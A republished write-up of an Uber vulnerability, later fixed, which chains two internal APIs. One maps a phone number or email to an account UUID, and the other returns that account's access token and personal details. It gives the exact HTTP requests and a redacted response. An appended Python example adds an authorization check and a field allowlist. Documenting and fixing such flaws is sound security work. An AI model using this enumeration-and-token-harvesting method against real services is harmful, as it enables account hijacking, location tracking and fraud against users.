2025-02-24 Update From: SLTechnology News&Howtos
Shulou(Shulou.com)05/31 Report--
This article describes how any registered Uber account could be hijacked through Uber's API. The content is detailed; interested readers can refer to it, and I hope it is helpful to you.
The vulnerability below is an arbitrary account takeover in Uber, affecting the registered accounts of Uber drivers, riders, third-party partners and Uber Eats delivery users. An attacker could obtain the UUID of a registered account through one Uber API, then use that UUID in a request to a second Uber API whose response contained the access token (token) of the account with that UUID, achieving account takeover.
Vulnerability overview and impact
The problem begins in one Uber API: if the phone number or email address the user reserved at registration is supplied in its POST request, the Uber backend responds with the UUID of the matching user account. A second Uber API then accepts that UUID and returns, among other things, the user's access token (Access Token) for the Uber mobile app. With that token, an attacker can hijack the account, track the user's location, carry out payment transactions and download trip routes, seriously compromising the security of the victim's account.
Vulnerability reproduction, step 1: obtain the UUID of any registered Uber user from the API
In the following Uber API POST request, supplying the phone number or email address reserved by a user (a third-party partner, rider or Eats account) at registration causes the response to contain that user's UUID. For example, obtaining the user's UUID from the phone number reserved at registration:
Request:
POST /p3/fleet-manager/_rpc?rpc=addDriverV2 HTTP/1.1
Host: partners.uber.com

{"nationalPhoneNumber": "99999xxxxx", "countryCode": "1"}
Response:
{"status": "failure", "data": {"code": 1009, "message": "Driver '47d063f8-0xx5eMury xxxxMub 01a murxxxx' not found"}}
When the phone number 99999xxxxx that the user reserved at registration is supplied in the request, the response returns the user's UUID: '47d063f8-0xx5emur4eb4murxxxxxxxxxxxxxxxxxxx'.
The following obtains the user's UUID from the email address reserved at registration:
Request:
POST /p3/fleet-manager/_rpc?rpc=addDriverV2 HTTP/1.1
Host: partners.uber.com

{"email": "xxx@gmail.com"}
Response:
{"status": "failure", "data": {"code": 1009, "message": "Driver 'ca111b95-1111-4396-b907-83abxx5f7371e' not found"}}
For the email address xxx@gmail.com reserved at registration, the Uber backend likewise returns the user's UUID: 'Ca111b95-1111-4396-b907-83abxxx5f7371e'.
Step 2: obtain the access token for that UUID from another API
With the UUID of any user obtained as above, a second Uber API accepts that UUID and returns sensitive information about the corresponding user, including the access token (Access Token) for the Uber mobile app, geographical location and home address. With the access token, any Uber account can be completely hijacked: its trip routes, ride requests, payment information and so on become visible. The proof below uses my own test account.
Obtaining the access token (Access Token) and other information through the second Uber API:
Request:
POST /marketplace/_rpc?rpc=getConsentScreenDetails HTTP/1.1
Host: bonjour.uber.com
Connection: close
Content-Length: 67
Accept: application/json
Origin: https://bonjour.uber.com
x-csrf-token: xxxx
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
DNT: 1
Content-Type: application/json
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: xxxxx

{"language": "en", "userUuid": "xxxx-776-4xxxx1bd-861a-837xxx604ce"}
The UUID in the above request is xxxx-776-4xxxx1bd-861a-837xxx604ce. When the request is executed with this UUID, the Uber backend responds as follows:
{
  "status": "success",
  "data": {
    "data": {"language": "en", "userUuid": "xxxxxx1e"},
    "getUser": {
      "uuid": "cxxxxxc5f7371e", "firstname": "Maxxxx", "lastname": "XXXX", "role": "PARTNER",
      "languageId": 1, "countryId": 77, "mobile": null, "mobileToken": 1234,
      "mobileCountryId": 77, "mobileCountryCode": "+91", "hasAmbiguousMobileCountry": false,
      "lastConfirmedMobileCountryId": 77, "email": "xxxx@gmail.com", "emailToken": "xxxxxxxx",
      "hasConfirmedMobile": "no", "hasOptedInSmsMarketing": false, "hasConfirmedEmail": true,
      "gratuity": 0.3, "nickname": "abc@gmail.com", "location": "00000", "banned": false,
      "cardio": false, "token": "b8038ec4143bb4xxxxxx72d", "fraudScore": 0, "inviterUuid": null,
      "pictureUrl": "xxxxx.jpeg", "recentFareSplitterUuids": ["xxx"],
      "lastSelectedPaymentProfileUuid": "xxxxxx", "lastSelectedPaymentProfileGoogleWalletUuid": null,
      "inviteCode": {
        "promotionCodeId": xxxxx, "promotionCodeUuid": "xxxx", "promotionCode": "manishas105",
        "createdAt": {"type": "Buffer", "data": [...]}, "updatedAt": {"type": "Buffer", "data": [...]}
      },
      "driverInfo": {
        "contactinfo": "999999999xx", "contactinfoCountryCode": "+91", "driverLicense": "None",
        "firstDriverTripUuid": null, "iphone": null, "partnerUserUuid": "xxxxxxx", "receiveSms": true,
        "twilioNumber": null, "twilioNumberFormatted": null, "cityknowledgeScore": 0,
        "createdAt": {"type": "Buffer", "data": [...]}, "updatedAt": {"type": "Buffer", "data": [...]},
        "deletedAt": null, "driverStatus": "APPLIED", "driverFlowType": "UBERX", "statusLocks": null,
        "contactinfoCountryIso2Code": "KR", "driverEngagement": null, "courierEngagement": null
      },
      "partnerInfo": {
        "address": "Nxxxxxxx", "territoryUuid": "xxxxxx", "company": "None", "address2": "None",
        "cityId": 130, "cityName": "None", "firstPartnerTripUuid": null,
        "preferredCollectionPaymentProfileUuid": null, "phone": "", "phoneCountryCode": "+91",
        "state": "None", "vatNumber": "None", "zipcode": "None",
        "createdAt": {"type": "Buffer", "data": [...]}, "updatedAt": {"type": "Buffer", "data": [...]},
        "deletedAt": null, "fleetTypes": [], "fleetServices": [], "isFleet": true
      },
      "analytics": {
        "signupLat": 133.28741199, "signupLng": 11177.1111, "signupTerritoryUuid": "xxxxx",
        "signupPromoId": null, "signupForm": "iphone", "signupSessionId": "xxxxxxx",
        "signupAppVersion": "2.64.1", "signupAttributionMethod": null,
        "createdAt": {"type": "Buffer", "data": [...]}, "updatedAt": {"type": "Buffer", "data": [...]},
        "signupCityId": 130, "signupDeviceId": null, "signupReferralId": null, "signupPromoCode": null,
        "signupPromoCodeUuid": null, "signupPromoUuid": null, "signupMethod": "REGULAR"
      },
      "createdAt": {"type": "Buffer", "data": [...]}, "updatedAt": {"type": "Buffer", "data": [...]},
      "deletedAt": null, "tenancy": "uber/production", "mobileConfirmationStatus": "MOBILE_NOT_CONFIRMED",
      "nationalId": null, "nationalIdType": null, "merchantLocation": null,
      "lastConfirmedMobile": "xxxxxxxxxx", "requestedDeletionAt": null, "dateOfBirth": xxxxxx,
      "userTypes": null, "preferredName": "xxxxxxxx", "freightInfo": null, "tempPictureUrl": null,
      "identityVerified": null, "paymentEntityType": null, "riderEngagement": null,
      "identityRejectReasonUuid": null, "genderInferred": null, "genderIdentity": null,
      "genderDocumented": null, "riderIneligibleWdw": null, "defaultPaymentProfileByProduct": null,
      "loginEligibility": null
    },
    "getDisclosureVersionUuid": "",
    "getLocaleCopy": null
  }
}
As the response shows, all of the sensitive information of the account behind the UUID is returned, including the user's access token for the Uber mobile app; with that token, any Uber account could be hijacked. After the report, Uber remediated the issue by enforcing authorization on this request and removing the sensitive fields from the response.
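A toy model of the two-part fix described above, added here as an example and not Uber's code: the getConsentScreenDetails handler refuses any userUuid that does not belong to the authenticated caller, and serialises the user record through an allowlist so fields such as token never leave the service. The vulnerable shape is kept beside it for contrast; the in-memory store, UUIDs and token values are constructed.

```python
"""Added example (not Uber's code): authorization check plus allowlisted
serialisation for the getConsentScreenDetails response, beside the
vulnerable handler shape the report describes."""

# Constructed sample store; UUID, token and contact details are made up.
ALICE_UUID = "47d063f8-0000-4000-8000-000000000001"
USERS = {
    ALICE_UUID: {
        "uuid": ALICE_UUID, "firstname": "Alice", "role": "PARTNER",
        "email": "alice@example.com", "nationalPhoneNumber": "9999900001",
        "token": "SECRET-SESSION-TOKEN", "emailToken": "SECRET-EMAIL-TOKEN",
        "mobileToken": 1234, "location": "00000",
    },
}
# Allowlist of fields a consent screen may show; secrets are absent by construction.
PUBLIC_FIELDS = ("uuid", "firstname", "role", "email")
# Keys the original response exposed that must never appear again.
SECRET_KEYS = {"token", "emailToken", "mobileToken", "location"}

def get_consent_screen_details(session_uuid: str, body: dict) -> dict:
    """Fixed handler. session_uuid is the account bound to the caller's
    authenticated session; the requested userUuid must be that same account
    (the missing authorization check), and only PUBLIC_FIELDS are returned."""
    requested = body.get("userUuid")
    if not requested or requested != session_uuid:
        # Uniform refusal: reveals nothing about whether the UUID exists.
        return {"status": "failure", "data": {"code": 403, "message": "Forbidden"}}
    user = USERS.get(requested)
    if user is None:
        return {"status": "failure", "data": {"code": 404, "message": "Not found"}}
    return {"status": "success",
            "data": {"data": {"language": body.get("language", "en"), "userUuid": requested},
                     "getUser": {k: user[k] for k in PUBLIC_FIELDS}}}

def vulnerable_get_consent_screen_details(body: dict) -> dict:
    """Vulnerable shape, for contrast: no ownership check, raw record serialised."""
    user = USERS.get(body.get("userUuid"))
    return {"status": "success", "data": {"getUser": dict(user or {})}}

def leaks_secret(response: dict) -> bool:
    """Regression check: True if any SECRET_KEYS key appears anywhere in the response."""
    def walk(node) -> bool:
        if isinstance(node, dict):
            return any(k in SECRET_KEYS or walk(v) for k, v in node.items())
        if isinstance(node, list):
            return any(walk(v) for v in node)
        return False
    return walk(response)
```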
That concludes this look at how any registered Uber account could be hijacked through the Uber API. I hope the above content is helpful and teaches you something new; if you found the article worthwhile, share it so that more people can read it.